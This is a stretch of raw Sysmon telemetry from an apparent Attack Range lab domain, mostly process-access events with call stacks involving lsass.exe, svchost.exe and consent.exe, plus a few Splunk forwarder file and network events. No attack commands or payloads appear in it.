07:51:46.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:46.056{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:46.056{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:46.056{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.035{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.035{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.035{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.035{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.974{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54F3F83FF475E7FACF7F5BF8D0DA2503,SHA256=D3CA90CD3E643880F1A244C3E1BE44730D6B458341D44B7E589A482FE9519B93,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807488Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:46.313{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57258-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807487Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:47.221{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF9178A401092AF1A3696CCA757017EB,SHA256=F9C08AABA650CFC981B6A3548F96B76E508D7BCD3A3B0C9F40B95BC9CABB83FF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.290{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+59c7f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001048615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:47.290{466BC892-32D3-60E8-700B-00000000CF01}1664384C:\Windows\System32\sihost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:47.290{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RP